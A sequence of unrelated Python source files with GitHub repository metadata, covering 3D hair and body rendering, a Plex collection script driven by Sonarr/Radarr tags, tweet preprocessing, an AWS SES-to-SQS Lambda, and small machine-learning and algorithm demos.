).to(self.device)
self.save_dir = os.path.join(save_dir, 'strands_rasterizers')
os.makedirs(self.save_dir, exist_ok=True)
def forward(self, strands_origins, z_app, raster_dict, iter):
rasterized = self.rasterizer(
strands_origins,
torch.cat((z_app, torch.ones(self.num_strands, 1).cuda()), dim=1),
raster_dict['cam_extr'],
raster_dict['cam_intr']
)
rasterized_features = rasterized[:, : self.feat_size, :, :]
raster_dict['rasterized_img'] = rasterized_features[0]
if self.use_orients_cond:
raster_idxs = rasterized[0, self.feat_size + 1:, :, :]
rasterized = rasterized[:, :self.feat_size + 1, :, :]
orients = torch.zeros_like(strands_origins)
orients[:, :orients.shape[1] - 1] = (strands_origins[:, 1:] - strands_origins[:, :-1])
orients[:, orients.shape[1] - 1: ] = orients[:, orients.shape[1] - 2: orients.shape[1] - 1]
orients = orients.reshape(-1, 3)
r = raster_idxs
r[r == 0] = -1
valid_pixels = r[r != -1]
strands_origins = soft_interpolate(valid_pixels.cuda(), strands_origins.view(-1, 3))
# Hard rasterize orientations
hard_orients = hard_interpolate(valid_pixels.cuda(), orients)
# Project orients and points from 3d to 2d with camera
projected_orients = project_orient_to_camera(hard_orients.unsqueeze(1), strands_origins, cam_intr=raster_dict['cam_intr'], cam_extr=raster_dict['cam_extr'])
plane_orients = torch.zeros(self.image_size, self.image_size, 1, device=hard_orients.device)
plane_orients[r[0]!=-1, :] = projected_orients
raster_dict['pred_orients'] = plane_orients.permute(2, 0, 1)
orient_cos_fine = plane_orients.cos()
orient_fine_cam = torch.cat(
[
orient_cos_fine * (orient_cos_fine >= 0),
plane_orients.sin(),
orient_cos_fine.abs() * (orient_cos_fine < 0)
],
dim=-1
)
raster_dict['visual_pred_orients'] = (orient_fine_cam.detach().cpu().numpy() * 255).clip(0, 255)
raster_dict['pred_silh'] = rasterized[0, self.feat_size:, :, :]
# Inpaint holes with unet
inp = [rasterized_features]
if self.use_orients_cond:
inp.append(plane_orients.permute(2, 0, 1)[None])
inp.append(orient_fine_cam.permute(2, 0, 1)[None])
inp = torch.cat(inp, dim=1)
rgb_hair_image = self.refiner_unet([inp]) #[1, 3, 512, 512]
raster_dict['pred_rgb'] = rgb_hair_image[0, :3]
return raster_dict
def calculate_losses(self, raster_dict, iter):
losses = {}
color_strands_error = (raster_dict['pred_rgb'] - raster_dict['gt_rgb']) * raster_dict['gt_silh']
losses['l1'] = F.l1_loss(
color_strands_error,
torch.zeros_like(color_strands_error), reduction='sum'
) / (raster_dict['gt_silh'].sum() + 1e-5)
losses['silh'] = ((raster_dict['pred_silh'] - raster_dict['gt_silh']).abs()).mean()
if iter % self.logging_freq == 0:
self.visualize(raster_dict, iter)
return losses
def visualize(self, visuals, iter):
cv2.imwrite(os.path.join(self.save_dir, f'rasterize_{iter}_resol_512.png'), tensor2image(visuals['rasterized_img'][:3, :, :]))
cv2.imwrite(os.path.join(self.save_dir, f'pred_silh_{iter}_resol_512.png'), tensor2image(visuals['pred_silh'][:3, :, :]))
cv2.imwrite(os.path.join(self.save_dir, f'gt_silh_{iter}_resol_512.png'), tensor2image(visuals['gt_silh'][:3, :, :]))
cv2.imwrite(
os.path.join(self.save_dir, f'pred_hair_strands_{iter}.png'),
tensor2image(visuals['pred_rgb'][:3, :, :] * visuals['gt_silh'] + 1 - visuals['gt_silh'])
)
cv2.imwrite(
os.path.join(self.save_dir, f'gt_hair_strands_{iter}.png'),
tensor2image(visuals['gt_rgb'][:3, :, :] * visuals['gt_silh'] + 1 - visuals['gt_silh'])
)
if self.use_orients_cond or self.use_gabor_loss:
cv2.imwrite(os.path.join(self.save_dir, f'pred_hair_or_{iter}.png'), visuals['visual_pred_orients'])
cv2.imwrite(os.path.join(self.save_dir, f'gt_hair_or_{iter}.png'), visuals['visual_gt_orients'])
| SamsungLabs/NeuralHaircut | src/hair_networks/strands_renderer.py | strands_renderer.py | py | 6,865 | python | en | code | 453 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "pytorch3d.io.load_obj",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pytorch3d.io.load... |
71919299305 | #!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
The use case of this script is the following:
Put all movies (radarr) or series (sonarr) with a certain tag in a collection in plex
Requirements (python3 -m pip install [requirement]):
requests
Setup:
Fill the variables below firstly, then run the script with -h to see the arguments that you need to give.
"""
plex_ip = ''
plex_port = ''
plex_api_token = ''
#These need to be filled when you want to use the script with sonarr
sonarr_ip = ''
sonarr_port = ''
sonarr_api_token = ''
#These need to be filled when you want to use the script with radarr
radarr_ip = ''
radarr_port = ''
radarr_api_token = ''
from os import getenv
import requests
# Environmental Variables
plex_ip = getenv('plex_ip', plex_ip)
plex_port = getenv('plex_port', plex_port)
plex_api_token = getenv('plex_api_token', plex_api_token)
base_url = f'http://{plex_ip}:{plex_port}'
sonarr_ip = getenv('sonarr_ip', sonarr_ip)
sonarr_port = getenv('sonarr_port', sonarr_port)
sonarr_api_token = getenv('sonarr_api_token', sonarr_api_token)
radarr_ip = getenv('radarr_ip', radarr_ip)
radarr_port = getenv('radarr_port', radarr_port)
radarr_api_token = getenv('radarr_api_token', radarr_api_token)
def _find_in_plex(plex_ssn, path: str, sections: list):
#find library that file is in
for lib in sections:
for loc in lib['Location']:
if loc['path'] in path:
lib_id = lib['key']
content_type = '1' if lib['type'] == 'movie' else '4'
break
else:
continue
break
else:
return ''
#find file in library
lib_output = plex_ssn.get(f'{base_url}/library/sections/{lib_id}/all', params={'type': content_type}).json()['MediaContainer']['Metadata']
for entry in lib_output:
for media in entry['Media']:
for part in media['Part']:
if path in part['file']:
return entry['grandparentRatingKey']
return ''
def tag_to_collection(plex_ssn, source: str, tag_name: str, library_name: str, collection_name: str):
result_json = []
sections = plex_ssn.get(f'{base_url}/library/sections').json()['MediaContainer']['Directory']
for lib in sections:
if lib['title'] == library_name:
lib_id = lib['key']
break
else:
return 'Library not found'
if source == 'sonarr':
if sonarr_ip and sonarr_port and sonarr_api_token:
#apply script to sonarr
sonarr_base_url = f'http://{sonarr_ip}:{sonarr_port}/api/v3'
sonarr_ssn = requests.Session()
sonarr_ssn.params.update({'apikey': sonarr_api_token})
try:
series_list = sonarr_ssn.get(f'{sonarr_base_url}/series').json()
except requests.exceptions.ConnectionError:
return 'Can\'t connect to Sonarr'
#find id of tag
tags = sonarr_ssn.get(f'{sonarr_base_url}/tag').json()
for tag in tags:
if tag['label'] == tag_name:
tag_id = tag['id']
break
else:
return 'Tag not found'
#loop through all series in sonarr
for series in series_list:
if tag_id in series['tags']:
#series found with tag applied
result_json.append(_find_in_plex(plex_ssn=plex_ssn, path=series['path'], sections=sections))
#delete prev collection with name
#create collection
#add ratingkeys to result_json
else:
return 'Sonarr set as source but variables not set'
elif source == 'radarr':
if radarr_ip and radarr_port and radarr_api_token:
#apply script to sonarr
radarr_base_url = f'http://{radarr_ip}:{radarr_port}/api/v3'
radarr_ssn = requests.Session()
radarr_ssn.params.update({'apikey': radarr_api_token})
try:
movie_list = radarr_ssn.get(f'{radarr_base_url}/movie').json()
except requests.exceptions.ConnectionError:
return 'Can\'t connect to Radarr'
#find id of tag
tags = radarr_ssn.get(f'{radarr_base_url}/tag')
for tag in tags:
if tag['label'] == tag_name:
tag_id = tag['id']
break
else:
return 'Tag not found'
#loop through all movies in radarr
for movie in movie_list:
if tag_id in movie['tags']:
#series found with tag applied
result_json.append(_find_in_plex(plex_ssn=plex_ssn, path=movie.get('movieFile','').get('path',''), sections=sections))
else:
return 'Radarr set as source but variables not set'
#delete collection if it already exists
collections = plex_ssn.get(f'{base_url}/library/sections/{lib_id}/collections').json()['MediaContainer'].get('Metadata',[])
for collection in collections:
if collection['title'] == collection_name:
plex_ssn.delete(f'{base_url}/library/collections/{collection["ratingKey"]}')
#create collection
machine_id = plex_ssn.get(f'{base_url}/').json()['MediaContainer']['machineIdentifier']
plex_ssn.post(f'{base_url}/library/collections', params={'type': '1' if source == 'radarr' else '2', 'title': collection_name, 'smart': '0', 'sectionId': lib_id, 'uri': f'server://{machine_id}/com.plexapp.plugins.library/library/metadata/{",".join(result_json)}'})
return result_json
if __name__ == '__main__':
from requests import Session
from argparse import ArgumentParser
#setup vars
ssn = Session()
ssn.headers.update({'Accept': 'application/json'})
ssn.params.update({'X-Plex-Token': plex_api_token})
#setup arg parsing
parser = ArgumentParser(description="Put all movies (radarr) or series (sonarr) with a certain tag in a collection in plex")
parser.add_argument('-s', '--Source', type=str, choices=['sonarr','radarr'], help="Select the source which media files should be checked", required=True)
parser.add_argument('-t', '--TagName', type=str, help="Name of tag to search for", required=True)
parser.add_argument('-l', '--LibraryName', type=str, help="Name of the target library to put the collection in", required=True)
parser.add_argument('-c', '--CollectionName', type=str, help="Name of the collection", required=True)
args = parser.parse_args()
#call function and process result
response = tag_to_collection(plex_ssn=ssn, source=args.Source, tag_name=args.TagName, library_name=args.LibraryName, collection_name=args.CollectionName)
if not isinstance(response, list):
parser.error(response)
| Casvt/Plex-scripts | sonarr/tag_to_collection.py | tag_to_collection.py | py | 6,013 | python | en | code | 285 | github-code | 36 | [
{
"api_name": "os.getenv",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 35,
... |
38093193093 | import typing
import pytest
from forml import project
from forml.io import dsl, layout
from forml.io._input import extract
class TestSlicer:
"""Slicer unit tests."""
@staticmethod
@pytest.fixture(scope='session')
def features(project_components: project.Components) -> typing.Sequence[dsl.Feature]:
"""Features components fixture."""
return project_components.source.extract.train.features
@staticmethod
@pytest.fixture(scope='session')
def labels(project_components: project.Components) -> dsl.Feature:
"""Labels components fixture."""
value = project_components.source.extract.labels
assert isinstance(value, dsl.Feature)
return value
@staticmethod
@pytest.fixture(scope='session')
def dataset(trainset: layout.RowMajor) -> layout.Tabular:
"""Dataset fixture."""
columns = layout.Dense.from_rows(trainset).to_columns()
return layout.Dense.from_columns([*columns, columns[-1]]) # duplicating the last column
@pytest.mark.parametrize(
'labels_factory, labels_width',
[
(lambda f: f, 1),
(lambda f: [f], 1),
(lambda f: [f, f], 2),
],
)
def test_slicer(
self,
labels_factory: typing.Callable[[dsl.Feature], typing.Union[dsl.Feature, typing.Sequence[dsl.Feature]]],
labels_width: int,
features: typing.Sequence[dsl.Feature],
labels: dsl.Feature,
dataset: layout.Tabular,
):
"""Slicing test."""
labels_fields = labels_factory(labels)
all_fields, slicer = extract.Slicer.from_columns(features, labels_fields)
assert len(all_fields) == len(features) + labels_width
assert len(slicer.args[0]) == len(features)
left, right = slicer().apply(dataset)
columns = dataset.to_columns()
assert len(left) == len(right) == len(columns[0])
assert len(left[0]) == len(features)
if isinstance(labels_fields, dsl.Feature):
assert right[0] == columns[-1][0]
else:
assert len(right[0]) == labels_width
| formlio/forml | tests/io/_input/test_extract.py | test_extract.py | py | 2,136 | python | en | code | 103 | github-code | 36 | [
{
"api_name": "forml.project.Components",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "forml.project",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pytest.fixture",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "typing.Seq... |
30381880481 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 30 09:32:26 2018
@author: jon
"""
import cmath
import math
import numpy as np
import matplotlib.pyplot as plt
from pynufft import NUFFT_cpu
def expectedIFT(img, X, u, v):
N = img.shape[0]//2
for x in range (-N, N):
for y in range(-N, N):
img[x-N, y-N] = img[x-N,y-N] + X * cmath.exp(-2j*math.pi * (u*x + v*y))
u0 = 0.05
v0 = 0.013
u1 = 0.0018
v1 = 0.046
img = np.zeros([32,32], dtype=np.complex128)
expectedIFT(img, 3, u0, v0)
expectedIFT(img, 2.5, u1, v1)
plt.imshow(np.real(img))
print(np.max(np.real(img)))
NufftObj = NUFFT_cpu()
Nd = (32, 32) # image size
Kd = (64, 64) # k-space size
Jd = (2, 2) # interpolation size
om = [
[u0, v0],
[u1,v1]]
NufftObj.plan(np.asarray(om), Nd, Kd, Jd)
img2 = NufftObj.adjoint([3, 2.5])
plt.imshow(np.real(img2))
print(np.max(np.real(img2)))
| lord-blueberry/p8-pipeline | sandbox/first_runs/pynufft/BUG.py | BUG.py | py | 915 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cmath.exp",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "math.pi",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.complex128",
"line_numbe... |
28959351830 | from cfg import constants
import torch
import numpy as np
import trimesh
import pyrender
import cv2
import os
def render_smpl(vertices, faces, image, intrinsics, pose, transl,
alpha=1.0, filename='render_sample.png'):
img_size = image.shape[-2]
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.2,
alphaMode='OPAQUE',
baseColorFactor=(0.8, 0.3, 0.3, 1.0))
# Generate SMPL vertices mesh
mesh = trimesh.Trimesh(vertices, faces)
# Default rotation of SMPL body model
rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])
mesh.apply_transform(rot)
mesh = pyrender.Mesh.from_trimesh(mesh, material=material)
scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))
scene.add(mesh, 'mesh')
camera_pose = np.eye(4)
camera_pose[:3, :3] = pose
camera_pose[:3, 3] = transl
camera = pyrender.IntrinsicsCamera(fx=intrinsics[0, 0], fy=intrinsics[1, 1],
cx=intrinsics[0, 2], cy=intrinsics[1, 2])
scene.add(camera, pose=camera_pose)
# Light information
light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)
light_pose = np.eye(4)
light_pose[:3, 3] = np.array([0, -1, 1])
scene.add(light, pose=light_pose)
light_pose[:3, 3] = np.array([0, 1, 1])
scene.add(light, pose=light_pose)
light_pose[:3, 3] = np.array([1, 1, 2])
scene.add(light, pose=light_pose)
renderer = pyrender.OffscreenRenderer(
viewport_width=img_size, viewport_height=img_size, point_size=1.0)
color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)
valid_mask = (rend_depth > 0)[:,:,None]
color = color.astype(np.float32) / 255.0
valid_mask = (rend_depth > 0)[:,:,None]
output_img = color[:, :, :3] * valid_mask + (1 - valid_mask) * image / 255.0
cv2.imwrite(filename, 255 * output_img)
def generate_figure(camera, pred_output, body_model, images, gt, iters, save_org=False):
from scipy.spatial.transform import Rotation as R
betas = pred_output.betas.clone()
body_pose = pred_output.body_pose.clone()
glob_ori = pred_output.global_orient.clone()
if body_pose.shape[-1] != 3:
body_pose = torch.from_numpy(R.from_rotvec(body_pose.cpu().detach().numpy().reshape(-1, 3)).as_matrix())[None].cuda().float()
glob_ori = torch.from_numpy(R.from_rotvec(glob_ori.cpu().detach().numpy().reshape(-1, 3)).as_matrix())[None].cuda().float()
faces = body_model.faces
gt = gt.detach().cpu().numpy()
for cam_idx in range(4):
image = images[0, cam_idx]
# Get camera information
camera_info = camera[cam_idx][0]
pose = camera_info.R
intrinsics = camera_info.K
transl = (camera_info.t.reshape(3)) / 1e3
transl[0] *= -1 # Adjust x-axis translation
# Change body orientation so that camera matrix to be identical
rot = torch.from_numpy(pose).to(device=glob_ori.device, dtype=glob_ori.dtype)
glob_ori_R = rot @ glob_ori
pred_output_ = body_model(betas=betas, body_pose=body_pose, global_orient=glob_ori_R, pose2rot=False)
# Match and tranform keypoints gt and pred
loc_gt = gt @ pose.T
loc_pred_ = pred_output_.joints[:, 25:][:, constants.SMPL_TO_H36].detach().cpu().numpy() * 1e3
loc_diff = loc_gt[:, 14] - loc_pred_[:, 14]
loc_pred_ = loc_pred_ + loc_diff
vertices = pred_output_.vertices[0].detach().cpu().numpy()
vertices = vertices + loc_diff / 1e3
if save_org:
cv2.imwrite('demo_figs/render_sample_%03d_org_%d.png'%(iters, cam_idx+1), image[:, :, ::-1])
filename = 'demo_figs/render_sample_%03d_%d.png'%(iters, cam_idx+1)
image_org = image[:, :, ::-1].copy()
render_smpl(vertices, faces, image[:, :, ::-1], intrinsics, np.eye(3), transl, filename=filename)
| yohanshin/Pseudo-SMPL-GT | utils/visualization.py | visualization.py | py | 3,955 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyrender.MetallicRoughnessMaterial",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "trimesh.Trimesh",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "trimesh.transformations.rotation_matrix",
"line_number": 28,
"usage_type": "call"
},... |
11038838210 | #!/usr/bin/env python
# coding: utf-8
# # Filter #1: Broken Frame 🔨
# My broken_frame() function creates a fractured effect in the image below that I liken in appearance to the Distorted Glass filter in Photoshop.
import PIL.ImageOps
from PIL import Image
def broken_frame(image):
length = image.size[1]
for x in range(image.size[0]):
for y in range(length - x):
left = image.getpixel((x, y))
right = image.getpixel((length - 1 - x, y))
image.putpixel((length - 1 - x, y), left)
image.putpixel((x, y), right)
testimage = Image.open('black girls in ux.png')
testimage
broken_frame(testimage)
testimage
| mars-aria/vfx-filters | broken-frame filter/broken-frame_filter.py | broken-frame_filter.py | py | 677 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 20,
"usage_type": "name"
}
] |
41674825810 | '''
--- Changes for this version ---
- change to save in txt format, as saved format no longer a valid json format
- removed the open and end line, only take tweet object
'''
# used material: workshop solution from past course in UniMelb (COMP20008): https://edstem.org/au/courses/9158/lessons/25867/slides/185032/solution
# packages: ijson https://pypi.org/project/ijson/
# simplejson https://pypi.org/project/simplejson/
# nltk https://www.nltk.org/
# re https://docs.python.org/3/library/re.html
# zipfile https://docs.python.org/3/library/zipfile.html
# used sal.json provided in Assignment 1
# used Bingguang and Arezoo's code for Assignment 1
##########################################################
# Refer to: regular expression document: https://www.w3schools.com/python/python_regex.asp
# keywords from: https://www.merriam-webster.com/thesaurus/volunteer
# deal with zip file: https://stackoverflow.com/questions/40824807/reading-zipped-json-files
# convert decimal in json: https://stackoverflow.com/questions/11875770/how-to-overcome-datetime-datetime-not-json-serializable and https://stackoverflow.com/questions/1960516/python-json-serialize-a-decimal-object
import ijson
import simplejson as json
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import re
from zipfile import ZipFile
import os
nltk.download('punkt')
nltk.download('stopwords')
# variables
SAL_PATH = 'data/sal.json'
output_path = 'preprocessed.json'
INPUT_PATH = 'data/twitter-huge.json.zip'
# create keywords dictionary, do stemmer step by nltk
keywords = ["voluntary", "volunteer", "volunteering", "nonprofit", "charity", "donor", "donation", "unpaid", "rendering", "bestowing", "volitional"]
porterStemmer = PorterStemmer()
keywords = set([porterStemmer.stem(w) for w in keywords])
stop_words = set(stopwords.words('english'))
'''
get string content, do nlp process:
- clean the content string
- tokenize
- remove stop words
- stem
--------------------------------------
code adapt from previous course in uniMelb workshop solution:
https://edstem.org/au/courses/9158/lessons/25867/slides/185032/solution
--------------------------------------
Args:
content (string): content need to process
Return:
stemmed (list): a list of words processed as described above
'''
def nlp_content(content):
out = re.sub(r'non-profit', 'nonprofit', content.lower())
out = re.sub(r'https:\/\/[^\s]+', '', out) # remove link
out = re.sub(r'[^A-z\s]', ' ', out) # remove all non-english character words
out = re.sub(r'\s+', ' ', out) # deal with multiple space
tokens = nltk.word_tokenize(out) # tokenisation
# stop words removal
no_stop_words = [w for w in tokens if w not in stop_words]
# Stemming
stemmed = [porterStemmer.stem(w) for w in no_stop_words]
return stemmed
'''
determine if a tweet as related content
-----------------------------------------
rules: if content mentioned words in key-word dictionary,
it is related, otherwise is not
-----------------------------------------
Args:
content (list): output of the nlp_content
Return:
True/False (related/not related)
'''
def determine_related(content):
for w in content:
if w in keywords:
return True
return False
'''
convert raw tweet record to contain only information needed
----------------------------------------------------------
rules:
- each tweet record after process will contain:
- user id
- content: string value
- place
- state: matched by sal.json
- related: as described above
- if tweet doesn't have any one of following, ignore:
- user id
- place
- language is not 'en'
- if no place name matched in sal.json, ignore record
---------------------------------------------------------------------
Args:
record: twitter data single record
Retrun:
out: processed tweet
'''
def convert_record(record):
try:
uid = record['doc']['data']['author_id']
place = record['doc']['includes']['places'][0]['full_name'].split(',')[0].lower()
lang = record['doc']['data']['lang']
state = -1
for k, v in state_dict.items():
if place in v:
state = k
break
if state == -1 or lang != 'en':
return False
except:
return False
try:
#original_content = BeautifulSoup(record['doc']['data']['text'], 'html.parser').text
original_content = record['doc']['data']['text']
content = nlp_content(original_content)
related = 0 if not determine_related(content=content) else 1
except:
original_content = ''
related = 0
out = dict()
out['uid'] = uid
out['content'] = original_content
out['place'] = place
out['state'] = state
out['related'] = related
return out
'''
load sal.json file. Use Bingguang and Arezoo's code for Assignment 1.
'''
with open(SAL_PATH) as fsal:
sal_items = ijson.items(fsal, '')
state_dict = {'1': [], '2': [], '3': [], '4': [], '5': [], '6': [], '7': [], '8': [], '9': []}
for item in sal_items:
for k, v in item.items():
state_dict[v['ste']].append(k)
# write processed data into preprocessed.json
#output_path = 'preprocessed.json'
try:
os.remove(output_path)
except:
pass
out = open(output_path, 'a')
out.write('[')
count = 1
with ZipFile(INPUT_PATH, 'r') as zip:
with zip.open(zip.namelist()[0]) as f:
items = ijson.items(f, 'rows.item')
for record in items:
record = convert_record(record)
if record != False:
js_out = json.dumps(record)
if count != 1:
out.write(', \n')
out.write(js_out)
count += 1
if count % 10000 == 0:
print(count, 'has been dealt with')
out.write(']')
out.close()
| Juaneag/COMP90024-Assignment2-Team39 | twitter/preprocess.py | preprocess.py | py | 5,927 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.download",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "nltk.stem.porter.PorterStemmer",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "nltk.corpu... |
23480037190 | from typing import List
class Solution:
def combinationSum(candidates: List[int], target: int) -> List[List[int]]:
answer = []
# 주어진 target에 candidates로 주어진 원소들을 빼나가면서 0이 나오면 정답에 추가하는 식으로 로직 구현
# 원소들의 조합의 합이 target이 되는지를 판단해야 하기 때문에 dfs를 이용
def dfs(cur_sum, cur_index, sub_answer):
# target에서 candidates로 주어진 원소들을 뺐는데 음수가 나오면 탈출
if cur_sum < 0:
return
# target에서 candidates로 주어진 원소들을 뺐는데 0이 나오면 정답에 추가하면서 탈출
elif cur_sum == 0:
answer.append(sub_answer)
return
# candidates에 주어진 값들이 중복 가능하다고 했기 때문에 dfs로 중복된 원소들의 합까지 확인
for index in range(cur_index, len(candidates)):
dfs(cur_sum - candidates[index], index, sub_answer + [candidates[index]])
dfs(target, 0, [])
return answer
result = combinationSum(candidates=[2, 3, 6, 7], target=7)
print(result)
| raddaslul/basic_algoritm | hikers/combination_sum.py | combination_sum.py | py | 1,231 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
}
] |
11737753941 | import pandas as pd
import numpy as np
from rdkit import Chem
# 1. sdfファイルの名前を指定
# ex. ChemCupid_Namiki.sdf
filename = 'ChemCupid_Namiki'
# -----------------------------------------
def main():
mols = [mol for mol in Chem.SDMolSupplier(
f'{filename}.sdf') if mol is not None]
smiles = [Chem.MolToSmiles(mol) for mol in mols]
df = pd.DataFrame({'SMILES': smiles})
print(f'output to {filename}.csv')
df.to_csv(f'{filename}.csv')
main()
| yuito118/share-chemo | sdfToSmiles.py | sdfToSmiles.py | py | 488 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rdkit.Chem.SDMolSupplier",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "rdkit.Chem",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "rdkit.Chem.MolToSmiles",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "rdkit.Chem... |
30097509663 | """Script for demonstrating polynomial regression.
Data obtained from: https://www.kaggle.com/karthickveerakumar/salary-data-simple-linear-regression
"""
import csv
import numpy as np
import matplotlib.pyplot as plt
NUM_ITERS = 250
ALPHA = 0.01
def main():
X, y = load_data()
X, stds = scale_features(X)
theta = np.zeros((10, 1))
plot(X, y, theta, 0, stds)
for i in range(NUM_ITERS):
theta = theta - ALPHA * compute_grad(X, y, theta)
plot(X, y, theta, i + 1, stds)
plt.show()
def load_data():
"""Loads the training set and returns it."""
X = []
y = []
with open("Salary_Data.csv") as csv_file:
csv_reader = csv.reader(csv_file)
next(csv_reader)
for row in csv_reader:
X.append([
1,
float(row[0]),
float(row[0]) ** 2,
float(row[0]) ** 3,
float(row[0]) ** 4,
float(row[0]) ** 5,
float(row[0]) ** 6,
float(row[0]) ** 7,
float(row[0]) ** 8,
float(row[0]) ** 9,
])
y.append(float(row[1]))
X = np.asarray(X).reshape((len(X), 10))
y = np.asarray(y).reshape((len(y), 1))
return X, y
def scale_features(X):
"""Scales the columns of X to have 1 std and returns it."""
stds = np.std(X, axis=0)
stds[0] = 1 # Make sure feature scaling isn't applied to x0.
scaled_X = X / stds
return scaled_X, stds
def compute_cost(X, y, theta):
"""Returns the cost for being parameterized by theta."""
m = X.shape[0]
differences = np.matmul(X, theta) - y
J = (1 / (2 * m)) * np.matmul(differences.T, differences)
return np.squeeze(J)
def compute_grad(X, y, theta):
"""Returns the partial derivatives of the cost function."""
m = X.shape[0]
differences = np.matmul(X, theta) - y
grad = (1 / m) * np.matmul(X.T, differences)
return grad
def predict(num_years, theta, stds):
"""Predicts salary given num_years of experience using the parameters."""
x = [
1,
num_years,
num_years ** 2,
num_years ** 3,
num_years ** 4,
num_years ** 5,
num_years ** 6,
num_years ** 7,
num_years ** 8,
num_years ** 9,
]
x = np.asarray(x).reshape((1, 10))
scaled_x = x / stds
y = np.matmul(scaled_x, theta)
return np.squeeze(y)
def plot(X, y, theta, iter, stds):
"""Plots the training set and the line."""
plt.clf()
plt.title(f"Iter: {iter} - Cost: {compute_cost(X, y, theta)}")
plt.scatter(X[:, 1] * stds[1], y)
x_values = [i / 10 for i in range(115)]
y_values = [predict(x, theta, stds) for x in x_values]
plt.plot(x_values, y_values) # Plot the non-linear line.
plt.xlim(0, 11.5)
plt.ylim(0, 150000)
plt.pause(0.1)
if __name__ == "__main__":
main()
| JhihYangWu/ML-Practice | 03 Polynomial Regression/polynomial_regression.py | polynomial_regression.py | py | 2,912 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "csv.reader",
... |
7047886953 | import base64
import json
import boto3
import uuid
from botocore.client import Config
def lambda_handler(event, context):
config = Config(connect_timeout=15, retries={'max_attempts': 3})
sqs = boto3.resource('sqs', config=config)
queue = sqs.get_queue_by_name(
QueueName='eks-notification-canada-cadelivery-receipts'
)
print("Queue {}".format(queue))
print("Task has begun")
for record in event["Records"]:
task = {
"task": "process-ses-result",
"id": str(uuid.uuid4()),
"args": [
{
"Message": record["Sns"]["Message"]
}
],
"kwargs": {},
"retries": 0,
"eta": None,
"expires": None,
"utc": True,
"callbacks": None,
"errbacks": None,
"timelimit": [
None,
None
],
"taskset": None,
"chord": None
}
envelope = {
"body": base64.b64encode(bytes(json.dumps(task), 'utf-8')).decode("utf-8"),
"content-encoding": "utf-8",
"content-type": "application/json",
"headers": {},
"properties": {
"reply_to": str(uuid.uuid4()),
"correlation_id": str(uuid.uuid4()),
"delivery_mode": 2,
"delivery_info": {
"priority": 0,
"exchange": "default",
"routing_key": "delivery-receipts"
},
"body_encoding": "base64",
"delivery_tag": str(uuid.uuid4())
}
}
msg = base64.b64encode(bytes(json.dumps(envelope), 'utf-8')).decode("utf-8")
queue.send_message(MessageBody=msg)
print("Record has moved to call process-ses-result")
print("Task has ended")
return {
'statusCode': 200
}
| cds-snc/notification-lambdas | sesemailcallbacks/ses_to_sqs_email_callbacks.py | ses_to_sqs_email_callbacks.py | py | 1,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "botocore.client.Config",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "boto3.resource",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "base64.b64encode",
... |
71508824103 | from wsgiref import simple_server
from flask import Flask, request, render_template,url_for, app
from flask import Response
from flask_cors import CORS, cross_origin
from logistic_deploy import predObj
import os
import json
app = Flask(__name__)
CORS(app)
app.config['DEBUG'] = True
class ClientApi:
def __init__(self):
self.predObj = predObj()
@app.route("/Train", methods=['POST'])
#@app.route("/")
#def home():
#return ClientApi()
def predictRoute():
try:
if request.json['data'] is not None:
data = request.json['data']
print('data is: ', data)
pred=predObj()
res = pred.predict_log(data)
result = clntApp.predObj.predict_log(data)
print('result is ',res)
return Response(res)
except ValueError:
return Response("Value not found")
except Exception as e:
print('exception is ',e)
return Response(e)
@app.route("/singlevaluepred", methods=['POST'])
def predict():
if request.method == 'POST':
Intercept = (request.form["Intercept"])
occ_2 = float(request.form["occ_2"])
occ_3 = float(request.form["occ_3"])
occ_4 = float(request.form["occ_4"])
occ_5 = float(request.form["occ_5"])
occ_6 = float(request.form["occ_6"])
occ_husb_2 = float(request.form["occ_husb_2"])
occ_husb_3 = float(request.form["occ_husb_3"])
occ_husb_4 = float(request.form["occ_husb_4"])
